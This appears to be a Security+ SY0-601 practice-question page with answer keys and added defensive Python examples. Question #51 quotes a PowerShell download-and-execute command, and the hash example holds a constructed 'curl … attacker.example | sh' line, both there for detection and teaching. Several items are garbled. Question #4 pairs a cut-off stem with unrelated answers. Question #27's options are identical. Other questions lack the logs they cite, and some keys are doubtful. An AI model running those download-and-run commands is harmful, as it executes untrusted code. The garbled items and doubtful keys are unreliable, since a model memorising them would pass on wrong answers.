Prepare Strategically for the CompTIA Security+ Exam with SY0-601 Practice Tests

For the CompTIA Security+ SY0-601 certification, having access to high-quality exam resources is essential for effective preparation. Practice test questions and answers that accurately reflect the exam content and objectives enable you to identify areas requiring further study. Comprehensive study guides provide in-depth explanations of topics such as risk management, incident response, cryptography, and security architecture. Video courses from trusted sources offer an engaging way to reinforce key concepts. Mock exams simulating the actual test environment help build time management skills and familiarity with the exam format. Regular practice with these exam resources helps reinforce your understanding of security fundamentals covered in the SY0-601 exam. By incorporating a diverse range of study materials, practice questions, and mock exams into your preparation, you increase your chances of passing the CompTIA Security+ certification exam successfully.

Question #1
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations. Which of the following would be the BEST solution to implement?
A. DLP
B. USB data blocker
C. USB OTG
D. Disabling USB ports
Correct Answer: B
Question #2
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the BEST remediation for this data leak?
A. User training
B. CASB
C. MDM
D. DLP
Correct Answer: B
Question #3
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?
A. MOU
B. ISA
C. SLA
D. BPA
Correct Answer: A
Question #4
The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer (CIO) believes the company can implement some basic controls to mitigate the majo
A. A RAT was installed and is transferring additional exploit tools
B. The workstations are beaconing to a command-and-control server
C. A logic bomb was executed and is responsible for the data transfers
D. A fileless virus is spreading in the local network environment
Correct Answer: AB
Question #5
A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?
A. Disable Telnet and force SSH
B. Establish a continuous ping
C. Utilize an agentless monitor
D. Enable SNMPv3 with passwords
Correct Answer: C
Question #6
Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?
A. TTP
B. OSINT
C. SOAR
D. SIEM
Correct Answer: C
Question #7
A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?
A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication
Correct Answer: C
Question #8
Which of the following terms describes a broad range of information that is sensitive to a specific organization?
A. Public
B. Top secret
C. Proprietary
D. Open-source
Correct Answer: C
Question #9
An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following considerations would BEST support the organization's resiliency?
A. Geographic dispersal
B. Generator power
C. Fire suppression
D. Facility automation
Correct Answer: A
Question #10
Which of the following controls is used to make an organization initially aware of a data compromise?
A. Protective
B. Preventative
C. Corrective
D. Detective
Correct Answer: D
Question #11
An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?
A. An international expansion project is currently underway
B. Outside consultants utilize this tool to measure security maturity
C. The organization is expecting to process credit card information
D. A government regulator has requested this audit to be completed
Correct Answer: C
Question #12
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients
B. The MRI vendor does not support newer versions of the OS
C. Changing the OS breaches a support SLA with the MRI vendor
D. The IT team does not have the budget required to upgrade the MRI scanner
Correct Answer: B
Question #13
An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being exploited?
A. Social media
B. Cloud
C. Supply chain
D. Social engineering
Correct Answer: C
Question #14
The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed. Which of the following solutions should the SOC consider to BEST improve its response time?
A. Configure a NIDS appliance using a Switched Port Analyzer
B. Collect OSINT and catalog the artifacts in a central repository
C. Implement a SOAR with customizable playbooks
D. Install a SIEM with community-driven threat intelligence
Correct Answer: C
Question #15
A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?
A. theHarvester
B. Cuckoo
C. Nmap
D. Nessus
Correct Answer: A
Question #16
Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?
A. CVSS
B. SIEM
C. SOAR
D. CVE
Correct Answer: A
Question #17
Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is the BEST solution to adopt?
A. PKI
B. Blockchain
C. SAML
D. OAuth
Correct Answer: A
Question #18
Which of the following is a known security risk associated with data archives that contain financial information?
A. Data can become a liability if archived longer than required by regulatory guidance
B. Data must be archived off-site to avoid breaches and meet business requirements
C. Companies are prohibited from providing archived data to e-discovery requests
D. Unencrypted archives should be preserved as long as possible and encrypted
Correct Answer: A
Question #19
A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this scenario?
A. Configuring signature-based antivirus to update every 30 minutes
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion
C. Implementing application execution in a sandbox for unknown software
D. Fuzzing new files for vulnerabilities if they are not digitally signed
Correct Answer: C
Question #20
As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the auditor do to complete the assessment?
A. User behavior analysis
B. Packet captures
C. Configuration reviews
D. Log analysis
Correct Answer: C
Question #21
An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?
A. Provide a domain parameter to the theHarvester tool
B. Check public DNS entries using dnsenum
C. Perform a Nessus vulnerability scan targeting a public company's IP
D. Execute nmap using the options: scan all ports and sneaky mode
Correct Answer: A
Question #22
A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?
A. DDoS
B. Privilege escalation
C. DNS poisoning
D. Buffer overflow
Correct Answer: A
Question #23
Which of the following is an example of transference of risk?
A. Purchasing insurance
B. Patching vulnerable servers
C. Retiring outdated applications
D. Application owner risk sign-off
Correct Answer: A
Question #24
Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Correct Answer: C
Question #25
The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?
A. NAC
B. ACL
C. WAF
D. NAT
Correct Answer: B
Question #26
A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?
A. SaaS
B. IaaS
C. PaaS
D. SDN
Correct Answer: A
Question #27
A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?
A. http://sample
B. http://sample
C. http://sample
D. http://redirect
Correct Answer: B
Question #28
A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?
A. Soft token
B. Smart card
C. CSR
D. SSH key
Correct Answer: D
Question #29
A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?
A. SSAE SOC 2
B. ISO 31000
C. NIST CSF
D. GDPR
Correct Answer: B
Question #30
Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing application?
A. Intellectual property theft
B. Elevated privileges
C. Unknown backdoor
D. Quality assurance
Correct Answer: C
Question #31
Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?
A. Version control
B. Continuous monitoring
C. Stored procedures
D. Automation
Correct Answer: A
Question #32
Which of the following tools is effective in preventing a user from accessing unauthorized removable media?
A. USB data blocker
B. Faraday cage
C. Proximity reader
D. Cable lock
Correct Answer: A
Question #33
A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?
A. Security patches were uninstalled due to user impact
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
Correct Answer: A
Question #34
A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the following output:
Which of the following is MOST likely occurring?
A. XSS attack
B. SQLi attack
C. Replay attack
D. XSRF attack
Correct Answer: B
Question #35
Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?
A. Asset management policy
B. Separation of duties policy
C. Acceptable use policy
D. Job rotation policy
Correct Answer: D
Question #36
Which of the following would BEST provide detective and corrective controls for thermal regulation?
A. A smoke detector
B. A fire alarm
C. An HVAC system
D. A fire suppression system
E. Guards
Correct Answer: C
Question #37
A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?
A. Fileless virus
B. Logic bomb
C. Keylogger
D. Ransomware
Correct Answer: B
Question #38
Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?
A. DLP
B. NIDS
C. TPM
D. FDE
Correct Answer: A
Question #39
A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?
A. Input validation
B. Code signing
C. SQL injection
D. Form submission
Correct Answer: A
Question #40
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Correct Answer: A
Question #41
A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?
A. WPA3
B. AES
C. RADIUS
D. WPS
Correct Answer: D
Question #42
A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will
A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups
Correct Answer: C
Question #43
A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd
D. Network services are no longer running on the NAS
Correct Answer: B
Question #44
An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false positives
B. Third-party libraries have been loaded into the repository and should be removed from the codebase
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated
Correct Answer: A
Question #45
A security administrator examines the ARP table of an access switch and sees the following output:
A. DDoS on Fa0/2 port
B. MAC flooding on Fa0/2 port
C. ARP poisoning on Fa0/1 port
D. DNS poisoning on port Fa0/1
Correct Answer: B
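The switch output for Question #45 is not reproduced on this page. The following is an added example, not exam material: it parses a constructed Cisco-style MAC address table and ARP cache (the column layout is an assumption) and shows what the two candidate answers look like in data. MAC flooding shows up as one port learning far more source addresses than any access port should; ARP poisoning shows up as two IP addresses, typically the gateway and an attacker host, resolving to the same hardware address.

```python
"""Spot MAC flooding and ARP-poisoning signs in switch tables.

Added example for Question #45; it is not part of the exam material, and the
switch output in the question is not reproduced on this page. SAMPLE_MAC_TABLE
and SAMPLE_ARP_TABLE below are constructed inputs in a Cisco-style
'show mac address-table' / 'show ip arp' layout (the layout is an assumption).
"""
from collections import defaultdict

# Constructed MAC table: Fa0/1 and Fa0/3 each carry one host, while Fa0/2 has
# learned 300 distinct source MACs, which is what a flooding tool produces.
SAMPLE_MAC_TABLE = "\n".join(
    ["Vlan    Mac Address       Type        Ports",
     "----    -----------       ----        -----",
     "1       0011.2233.4455    DYNAMIC     Fa0/1",
     "1       0011.2233.4466    DYNAMIC     Fa0/3"]
    + [f"1       dead.{i:04x}.0001    DYNAMIC     Fa0/2" for i in range(300)]
)

# Constructed ARP table: the gateway 10.0.0.1 now resolves to the same MAC as
# the host 10.0.0.50, a classic sign that 10.0.0.50 is poisoning the cache.
SAMPLE_ARP_TABLE = """Protocol  Address     Age (min)  Hardware Addr   Type   Interface
Internet  10.0.0.1    0          0011.2233.4455  ARPA   Vlan1
Internet  10.0.0.50   3          0011.2233.4455  ARPA   Vlan1
Internet  10.0.0.60   7          0011.2233.4466  ARPA   Vlan1
"""


def macs_per_port(mac_table):
    """Map each port to the number of distinct MACs learned on it."""
    seen = defaultdict(set)
    for line in mac_table.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2].upper() not in ("DYNAMIC", "STATIC"):
            continue  # header, separator, or unexpected layout
        _vlan, mac, _kind, port = parts
        seen[port].add(mac.lower())
    return {port: len(macs) for port, macs in seen.items()}


def flooding_ports(mac_table, threshold=50):
    """Ports with more distinct MACs than an access port should ever learn.

    The threshold is an assumption for access ports; uplinks and ports facing
    hypervisors legitimately carry many MACs and need a higher limit.
    """
    return sorted(p for p, n in macs_per_port(mac_table).items() if n > threshold)


def duplicate_mac_ips(arp_table):
    """IP addresses that share one hardware address in the ARP cache."""
    by_mac = defaultdict(list)
    for line in arp_table.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[0] != "Internet":
            continue  # header or unexpected layout
        _proto, ip, _age, mac, _kind, _iface = parts
        by_mac[mac.lower()].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    print("flooding:", flooding_ports(SAMPLE_MAC_TABLE))        # ['Fa0/2']
    print("shared MACs:", duplicate_mac_ips(SAMPLE_ARP_TABLE))  # one MAC -> two IPs
```

On a real switch the first-line defence is port security (a per-port MAC limit with a shutdown or restrict action), which turns the flooding signal above into an enforced limit rather than an after-the-fact report; dynamic ARP inspection covers the poisoning case.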
Question #46
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations?
A. Non-compliance with data sovereignty rules
B. Loss of the vendors' interoperability support
C. Mandatory deployment of a SIEM solution
D. Increase in the attack surface
Correct Answer: D
Question #47
Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Correct Answer: A
Question #48
A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?
A. CVE
B. SIEM
C. SOAR
D. CVSS
Correct Answer: D
Question #49
Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments through a single firewall?
A. Transit gateway
B. Cloud hot site
C. Edge computing
D. DNS sinkhole
Correct Answer: A
Question #50
An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which of the following is the environment in which patches will be deployed just prior to being put into an operational status?
A. Development
B. Test
C. Production
D. Staging
Correct Answer: D
Question #51
An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. PowerShell code is performing a DLL injection
B. PowerShell code is displaying a picture
C. PowerShell code is configuring environmental variables
D. PowerShell code is changing Windows Update settings
Correct Answer: A
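The exam key labels Question #51 "DLL injection"; what the script actually does is fetch a payload disguised as a .jpg, write it to TEMP as a .dll, and launch it through rundll32.exe, a signed Windows binary used as an execution proxy. That behaviour, not the label, is what a detection should key on. The following is an added example, not exam material or any vendor's rule: it extracts those indicators from the command line quoted in the question and from a constructed benign download for comparison. The indicator names and the binary list are this example's own choices.

```python
"""Flag a download-and-execute PowerShell command line.

Added example for Question #51, not part of the exam material. SUSPECT is the
command quoted in the question; BENIGN is a constructed comparison. The
indicator names and the proxy-binary list are this example's own choices.
"""
import re

SUSPECT = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
           r"-URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;"
           r"Start-Process rundll32.exe $env:TEMP\autoupdate.dll")
BENIGN = (r"powershell.exe -Command Invoke-WebRequest -Uri https://example.com/report.pdf "
          r"-OutFile $env:USERPROFILE\Downloads\report.pdf")

IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
EXEC_EXT = (".dll", ".exe", ".ps1", ".vbs", ".js", ".hta")
# Signed Windows binaries commonly abused to run attacker-supplied code
PROXY_BINARIES = ("rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe")


def indicators(cmdline):
    """Return the indicator names present in one PowerShell command line."""
    low = cmdline.lower()
    found = []
    # Arguments end at whitespace or at the ';' that separates PowerShell statements
    uri = re.search(r"-uri\s+([^\s;]+)", low)
    out = re.search(r"-outfile\s+([^\s;]+)", low)
    if uri and out and uri.group(1).endswith(IMAGE_EXT) and out.group(1).endswith(EXEC_EXT):
        found.append("payload_masquerading_as_image")   # .jpg on the wire, .dll on disk
    if out and out.group(1).endswith(EXEC_EXT) and (
            "$env:temp" in out.group(1) or "\\temp\\" in out.group(1)):
        found.append("executable_written_to_temp")
    launch = re.search(r"start-process\s+([^\s;]+)\s+([^\s;]+)", low)
    if launch and launch.group(1) in PROXY_BINARIES:
        found.append("proxy_execution:" + launch.group(1))
        if out and launch.group(2) == out.group(1):
            found.append("executes_downloaded_file")     # the dropped file is the argument
    return found


def is_download_and_execute(cmdline):
    """True when the command launches the very file it just downloaded."""
    return "executes_downloaded_file" in indicators(cmdline)


if __name__ == "__main__":
    for name, cmd in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, indicators(cmd))
```

In production this logic belongs on process-creation telemetry (Sysmon event 1 or the EDR equivalent), keyed on the parent being a .lnk launch or Explorer and the child being powershell.exe, so that the command line is inspected before the dropped DLL runs rather than after.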
Question #52
A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?
A. Dump file
B. System log
C. Web application log
D. Security log
Correct Answer: A
Question #53
Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Correct Answer: B
Question #54
Which of the following is a risk that is specifically associated with hosting applications in the public cloud?
A. Unsecured root accounts
B. Zero-day
C. Shared tenancy
D. Insider threat
Correct Answer: C
Question #55
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
Correct Answer: B
Question #56
A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network.Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?
A. WPS
B. WPA2
C. EAP
D. HTTPS
Correct Answer: B
Question #57
A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?
A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future
B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed
C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point
D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach
Correct Answer: A
Question #58
Which of the following is a reason to publish files' hashes?
A. To validate the integrity of the files
B. To verify if the software was digitally signed
C. To use the hash as a software activation key
D. To use the hash as a decryption passphrase
Correct Answer: A
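The point behind Question #58 is that a published hash lets the downloader recompute the digest and compare, which catches corruption and tampering of the file but says nothing about who produced it (that is what a signature adds, which is why option B is wrong). The following is an added example, not exam material: both sides of the exchange in one place, a publisher writing a sha256sum-style manifest and a consumer checking a download against it. The release files and the tampered download are constructed for the demo.

```python
"""Verify downloaded files against a published SHA-256 manifest.

Added example for Question #58, not part of the exam material. The files and
the manifest are constructed here; in practice the manifest comes from the
publisher over a channel you trust (and is ideally signed), because a hash
only proves integrity relative to the value you were given.
"""
import hashlib
import hmac


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def make_manifest(files):
    """Publisher side: sha256sum-style lines, '<hex digest>  <filename>'."""
    return "".join(f"{sha256_hex(data)}  {name}\n" for name, data in sorted(files.items()))


def parse_manifest(text):
    """Consumer side: map filename -> expected lowercase hex digest."""
    expected = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        digest, _sep, name = line.partition("  ")
        expected[name.strip()] = digest.strip().lower()
    return expected


def verify(files, manifest_text):
    """Consumer side: {filename: 'ok' | 'mismatch' | 'unlisted'}."""
    expected = parse_manifest(manifest_text)
    status = {}
    for name, data in files.items():
        if name not in expected:
            status[name] = "unlisted"        # nothing to compare against
            continue
        actual = sha256_hex(data)
        # constant-time compare: not strictly needed for a public digest, but cheap
        status[name] = "ok" if hmac.compare_digest(actual, expected[name]) else "mismatch"
    return status


# Constructed release as the publisher shipped it
RELEASE = {
    "tool-1.0.tar.gz": b"release archive bytes",
    "install.sh": b"#!/bin/sh\necho install\n",
}
PUBLISHED_MANIFEST = make_manifest(RELEASE)

# Constructed download: the archive is intact, install.sh was altered in
# transit, and an extra file appeared that the publisher never listed.
DOWNLOADED = {
    "tool-1.0.tar.gz": RELEASE["tool-1.0.tar.gz"],
    "install.sh": b"#!/bin/sh\ncurl -s http://attacker.example/x | sh\n",
    "extra.bin": b"\x00\x01",
}

if __name__ == "__main__":
    print(verify(DOWNLOADED, PUBLISHED_MANIFEST))
```

Treat "unlisted" as a failure, not a warning: an attacker who can alter files in transit can add one just as easily, and a manifest that only covers some files proves nothing about the rest. If the manifest is fetched from the same server as the files, an attacker who replaced the files can replace the manifest too; that is the hash substitution case from Question #55, and the defence is a signature over the manifest.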
Question #59
A company that provides an online streaming service made its customers' personal data, including names and email addresses, publicly available in a cloud storage service. As a result, the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?
A. Regulatory fines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Correct Answer: B
Question #60
Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?
A. Recovery
B. Deterrent
C. Corrective
D. Detective
Correct Answer: D
Question #61
A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?
A. True negative
B. True positive
C. False positive
D. False negative
Correct Answer: C
Question #62
A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?
A. Red-team exercise
B. Capture-the-flag exercise
C. Tabletop exercise
D. Phishing exercise
Correct Answer: C
Question #63
An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?
A. An external security assessment
B. A bug bounty program
C. A tabletop exercise
D. A red-team engagement
Correct Answer: C
Question #64
A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?
A. Privilege creep
B. Unmodified default settings
C. TLS protocol vulnerabilities
D. Improper patch management
Correct Answer: B
Question #65
A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?
A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding
Correct Answer: D
Question #66
A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company's mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. User-agent spoofing
C. WAF bypass
D. Referrer manipulation
Correct Answer: B
Question #67
Which of the following is the BEST action to foster a consistent and auditable incident response process?
A. Incent new hires to constantly update the document with external knowledge
B. Publish the document in a central repository that is easily accessible to the organization
C. Restrict eligibility to comment on the process to subject matter experts of each IT silo
D. Rotate CIRT members to foster a shared responsibility model in the organization
Correct Answer: D
Question #68
A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Correct Answer: B
Question #69
A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?
A. Subject alternative name
B. Wildcard
C. Self-signed
D. Domain validation
Correct Answer: B
Question #70
A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which of the following tools will the other team member MOST likely use to open this file?
A. Autopsy
B. Memdump
C. FTK Imager
D. Wireshark
Correct Answer: D
Question #71
The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a __________.
A. Data controller
B. Data owner
C. Data custodian
D. Data processor
Correct Answer: C
Question #72
A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?
A. Drop
B. Reject
C. Log alert
D. Permit
Correct Answer: A
Question #73
A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?
A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution
Correct Answer: D
Question #74
HOTSPOT (Drag and Drop is not supported)
An incident has occurred in the production environment.
INSTRUCTIONS
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
A. See Explanation section for answer
Correct Answer: A
Question #75
Which of the following is a targeted attack aimed at compromising users within a specific industry or group?
A. Watering hole
B. Typosquatting
C. Hoax
D. Impersonation
Correct Answer: A
Question #76
A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?
A. Intranet
B. Screened subnet
C. VLAN segmentation
D. Zero Trust
Correct Answer: C
Question #77
A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?
A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based
Correct Answer: A
Question #78
During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?
A. ls
B. chflags
C. chmod
D. lsof
E. setuid
Correct Answer: C
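The chmod operation behind Question #78 is two changes at once: clearing the set-user-ID bit (so the file no longer runs with its owner's privileges) and dropping the group/other permissions it never needed. The following is an added example, not exam material: it applies exactly what `chmod u-s,g-wx,o-wx FILE` does at the shell, using Python's os.chmod and the stat constants, and then re-reads the mode so the result can be verified rather than assumed. The temporary file and its starting mode (4777) are constructed for the demo.

```python
"""Strip the set-user-ID bit and tighten permissions with chmod semantics.

Added example for Question #78, not part of the exam material. It does in
Python what `chmod u-s,g-wx,o-wx FILE` does at the shell, so the before and
after states can be checked in one place; the temporary file is constructed.
"""
import os
import stat
import tempfile

SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID
GROUP_OTHER_WX = stat.S_IWGRP | stat.S_IXGRP | stat.S_IWOTH | stat.S_IXOTH


def current_mode(path):
    """Permission bits only (no file-type bits), the number chmod takes."""
    return stat.S_IMODE(os.stat(path).st_mode)


def harden(path):
    """Remove setuid/setgid and group/other write+execute; return the new mode.

    Uses a read-modify-write of the existing mode instead of a fixed octal so
    the owner's bits and group/other read access are left as they were.
    """
    os.chmod(path, current_mode(path) & ~(SPECIAL_BITS | GROUP_OTHER_WX))
    return current_mode(path)


def find_special(paths):
    """Paths that still carry setuid or setgid, for a post-change sweep."""
    return [p for p in paths if current_mode(p) & SPECIAL_BITS]


def demo():
    """Create an overly permissive file, harden it, report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        helper = os.path.join(tmp, "helper")
        with open(helper, "wb") as fh:
            fh.write(b"#!/bin/sh\necho hi\n")
        os.chmod(helper, 0o4777)        # the finding: chmod 4777 (setuid, world-writable)
        after = harden(helper)          # same effect as chmod u-s,g-wx,o-wx helper
        return after, find_special([helper])


if __name__ == "__main__":
    mode, leftovers = demo()
    print(oct(mode), leftovers)         # 0o744 []
```

The reason to re-read the mode afterwards rather than trusting the call is that on many systems a non-root user's chmod silently drops the setgid bit, and some filesystems ignore the special bits entirely; asserting on the stored mode catches both. A fleet-wide sweep is the same find_special() logic over `find / -perm /6000 -type f` output.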
Question #79
Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Correct Answer: C
Question #80
A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter th
A. An external access point is engaging in an evil-twin attack
